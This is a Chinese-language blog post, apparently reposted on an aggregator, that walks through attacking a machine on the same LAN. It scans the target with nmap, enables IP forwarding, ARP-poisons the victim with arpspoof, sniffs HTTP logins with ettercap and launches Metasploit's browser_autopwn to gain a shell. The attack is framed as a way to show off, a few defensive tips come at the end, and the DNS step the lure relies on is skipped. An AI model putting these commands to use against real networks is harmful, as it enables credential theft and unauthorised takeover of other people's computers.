Quantcast
Channel: CodeSection,代码区,网络安全 - CodeSec
Viewing all articles
Browse latest Browse all 12749

Ettercap劫持辅助Metasploit进行浏览器攻击

$
0
0

00x01

如果在同局域网下你想尝试攻破对方机器但是他并没有开放你可利用的端口进行攻击

但是你惊讶的发现,你在Http劫持的时候看到一个可疑的邮箱与密码,这样你便拿下了他的账户

但是你想深入到他的计算机中留下你想要的痕迹来显示你惊人的技术

But,你没有任何方式,只能眼睁睁的看着他逃脱你得魔爪,可是你甘心么?

00x02

攻击器前的准备

1#Kali系统一台

2#被攻击者邮箱

# #

00X03

攻击前信息搜集

1#被攻击者ip:192.168.1.106-

2#被攻击者网关:192.168.1.1

00x04

既然我们已经得到他的ip,那么我们先扫一下他的端口

命令:

<font size="4">nmap -A 192.168.1.106</font>

反馈信息:

<font size="4"> 135/tcp open msrpc 139/tcp open netbios-ssn 445/tcp open microsoft-ds 49152/tcp open unknown 49154/tcp open unknown 49155/tcp open unknown 49158/tcp open unknown </font>

可以看见,开放端口并不多,135,139,445端口虽然是开放的,但是已经打了补丁,无法直接攻击反弹得到shell

我们先劫持他的Http,看看有什么可利用的信息。

1# 进行流量转发,让目标流量经过本机

命令:

<font size="4">echo 1 >> /proc/sys/net/ipv4/ip_forward[/font]</font>

注释:把1写入ip_forward文件中

命令:

<font size="4">cat /proc/sys/net/ipv4/ip_forward</font>

注释:检查是否已经写入

可以看见,1已经写入ip_forward中了,我们利用Arpspoof这款工具开始进行Arp欺骗

命令: arpspoof -t 192.168.1.106 192.168.1.1

So~ 那么我们先开始劫持他的Http密文

命令:

ettercap -Tq -i eth0

开始劫持~~ 因为不是真实攻击,所以我来伪造一个登录的数据流发过去。

,如

User=账户

Pass=密码

当然,Http跟Https劫持的方式是不同的。

现在还远远不够,我们还是没有突破口,感觉好头大,与是一个奇颖怪招出来了,攻击他的浏览器,从而突破拿到权限

我们先打开metasploit

命令:

<font size="4">msfconsole</font>

当然,再此之前我们需要启动他所需要的服务

命令:

<font size="4">service postgresql start</font>

启动成功,我们接着加载他的Browser_autopwn模块这是一个自动攻击浏览器的模块。它会自动感应攻击目标的浏览器并且对它发动适当的攻击。

命令:

use server/browser_autopwn

查看所需要的设置

命令:

show options

他会显示以下东西

Module options (auxiliary/server/browser_autopwn): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST yes The IP address to use for reverse-connect payloads SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0 SRVPORT 8080 yes The local port to listen on SSL false no Negotiate SSL for incoming connections SSLCert no Path to a custom SSL certificate (default is randomly generated) URIPATH no The URI to use for this exploit (default is random)

一般人是不会怀疑的直接进行更新,那么在他更新的一瞬间,他就已经中招了他的浏览器已经开始被攻击

例如是什么系统,等信息已经出来了,耐心等待就会返回一个shell

00x05

总结

1# 有时候无法攻破局域网的主机的时候可以尝试进行浏览器攻击得到权限

2# 不一定只有msf的那个模块才可以进行浏览器攻击例如beff也是可以的

3# Dns的确是个很不错的帮手,他会帮助你少去很多麻烦

防护建议

1# 浏览器补丁要经常打,对于系统漏洞也需要经常打补丁

2# 开启Arp防火墙

3# 发现DNS不对劲立刻纠正过来否则会承受系统沦陷的后果

4# 杀软防火墙等是需要存在的,


Viewing all articles
Browse latest Browse all 12749

Trending Articles